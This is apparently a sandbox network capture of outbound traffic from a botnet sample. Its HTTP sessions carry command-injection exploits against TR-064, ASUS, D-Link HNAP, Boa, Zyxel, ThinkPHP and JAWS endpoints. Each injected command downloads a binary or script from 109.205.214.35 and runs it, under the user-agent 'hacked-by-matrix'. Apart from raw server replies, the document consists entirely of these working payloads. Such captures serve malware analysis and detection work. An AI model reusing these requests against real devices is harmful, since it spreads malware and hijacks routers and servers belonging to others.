                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1102192.168.2.134527061.71.243.757547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:15.009363890 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:15.969333887 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1103192.168.2.1353742172.65.72.98080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:15.171963930 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1104192.168.2.1342828172.65.163.638080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:15.172105074 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1105192.168.2.1349416172.66.215.1498080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:15.172624111 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1106192.168.2.1337928172.64.22.2038080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:15.254194021 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1107192.168.2.134287082.165.117.1628081
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:15.469064951 CET763OUTPOST /HNAP1/ HTTP/1.0
                                                        Content-Type: text/xml; charset="utf-8"
                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`
                                                        Content-Length: 640
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                        Mar 21, 2024 05:23:15.728302002 CET763OUTPOST /HNAP1/ HTTP/1.0
                                                        Content-Type: text/xml; charset="utf-8"
                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`
                                                        Content-Length: 640
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                        Mar 21, 2024 05:23:15.981976986 CET1286INHTTP/1.0 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:23:15 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        X-Powered-By: PHP/7.4.8
                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                        Link: <https://annahof-berg.de/wp-json/>; rel="https://api.w.org/"
                                                        Connection: close
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 26 20 21 28 49 45 20 38 29 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 7c 20 41 6e 6e 61 20 48 6f 66 20 42 65 72 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6e 6e 61 68 6f 66 2d 62 65 72 67 2e 64 65 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6e 6e 61 68 6f 66 2d 62 65 72 67 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 77 65 6e 74 79 74 77 65 6c 76 65 2f 6a 73 2f 68 74 6d 6c 35 2e 6a 73 3f 76 65 72 3d 33 2e 37 2e 30 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 6e 6e 61 68 6f 66 2d 62 65 72 67 2e 64 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6e 6e 61 20 48 6f 66 20 42 65 72 67 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6e 6e 61 68 6f 66 2d 62 65 72 67 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6e 6e 61 20 48 6f 66 20 42 65 72 67 20 26 72 61 71 75 6f 3b 20
                                                        Data Ascii: <!DOCTYPE html>...[if IE 7]><html class="ie ie7" lang="de-DE"><![endif]-->...[if IE 8]><html class="ie ie8" lang="de-DE"><![endif]-->...[if !(IE 7) & !(IE 8)]>...><html lang="de-DE">...<![endif]--><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width" /><title>Seite nicht gefunden | Anna Hof Berg</title><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="https://annahof-berg.de/xmlrpc.php">...[if lt IE 9]><script src="https://annahof-berg.de/wp-content/themes/twentytwelve/js/html5.js?ver=3.7.0" type="text/javascript"></script><![endif]--><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//annahof-berg.de' /><link rel="alternate" type="application/rss+xml" title="Anna Hof Berg &raquo; Feed" href="https://annahof-berg.de/feed/" /><link rel="alternate" type="application/rss+xml" title="Anna Hof Berg &raquo;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1108192.168.2.1350530213.78.141.1281723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:15.822190046 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1109192.168.2.1349942213.48.227.2431723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:15.853677988 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1110192.168.2.1342238213.194.136.2321723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:15.863287926 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1111192.168.2.1356658213.243.54.931723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:16.081696033 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1112192.168.2.1333602213.243.37.1041723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:16.084548950 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1113192.168.2.1334784206.233.156.22980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:16.205336094 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:16.513762951 CET504INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:13 GMT
                                                        Connection: close
                                                        Content-Length: 315
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                                        Mar 21, 2024 05:23:17.418688059 CET504INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:13 GMT
                                                        Connection: close
                                                        Content-Length: 315
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                                        Mar 21, 2024 05:23:19.228276968 CET504INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:13 GMT
                                                        Connection: close
                                                        Content-Length: 315
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1114192.168.2.133366095.179.216.6980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:16.989903927 CET313OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1115192.168.2.1357098188.34.197.7380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.025057077 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:17.220240116 CET174INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75
